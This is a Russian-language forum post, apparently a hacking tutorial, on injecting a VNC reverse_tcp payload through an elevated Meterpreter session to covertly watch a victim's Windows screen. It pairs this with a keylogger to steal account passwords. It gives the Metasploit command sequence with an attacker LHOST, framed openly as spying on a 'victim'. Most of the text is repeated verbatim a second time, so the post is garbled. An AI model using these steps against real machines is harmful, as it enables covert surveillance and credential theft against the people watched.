Привет! Здесь пойдет речь о том как использовать VNC -сервер на удаленном компьютере. Что такое VNC и зачем он нам нужен? Немного теории:
Virtual Network Computing (VNC) — система удалённого доступа к рабочему столу компьютера, использующая протокол RFB (RemoteFrameBuffer,удалённый кадровый буфер). Управление осуществляется путём передачи нажатий клавиш на клавиатуре и движений мыши с одного компьютера на другой и ретрансляции содержимого экрана через компьютерные сети.
Сразу оговорюсь, что запущенный через шелл meterpreter’a VNC – сервер, к сожалению не позволит нам управлять этим компьютером.
Вместо этого мы сможем наблюдать за действиями на мониторе жертвы, вовремя делать скриншоты экрана, собирая интересную информацию, параллельно включив кейлоггер, добывать пароли именно от интересующих нас аккаунтов и т.д.
Приступим, как обычно, перед началом всех манипуляций открываем сессию meterpreter с повышенными привилегиями,
(с базовыми получалось на Windows 7. Win 8.1 и 10 только с повышенными), и пишем по порядку, нижеследующее:
> use windows/manage/payload_inject
> set payload windows/vncinject/reverse_tcp
> set LHOST 192.168.0.18 (IP атакуещего)
> set session 2 (Номер вашей сессии с привилегиями)
> set handler true
> exploit
Убеждаемся, что все идет успешно:
В результате этих действий будет открыто окно VNC – сервера:
Virtual Network Computing (VNC) — система удалённого доступа к рабочему столу компьютера, использующая протокол RFB (RemoteFrameBuffer,удалённый кадровый буфер). Управление осуществляется путём передачи нажатий клавиш на клавиатуре и движений мыши с одного компьютера на другой и ретрансляции содержимого экрана через компьютерные сети.
Сразу оговорюсь, что запущенный через шелл meterpreter’a VNC – сервер, к сожалению не позволит нам управлять этим компьютером.
Вместо этого мы сможем наблюдать за действиями на мониторе жертвы, вовремя делать скриншоты экрана, собирая интересную информацию, параллельно включив кейлоггер, добывать пароли именно от интересующих нас аккаунтов и т.д.
Приступим, как обычно, перед началом всех манипуляций открываем сессию meterpreter с повышенными привилегиями,
(с базовыми получалось на Windows 7. Win 8.1 и 10 только с повышенными), и пишем по порядку, нижеследующее:
> use windows/manage/payload_inject
> set payload windows/vncinject/reverse_tcp
> set LHOST 192.168.0.18 (IP атакуещего)
> set session 2 (Номер вашей сессии с привилегиями)
> set handler true
> exploit
Убеждаемся, что все идет успешно:
В результате этих действий будет открыто окно VNC – сервера:
Последнее редактирование модератором: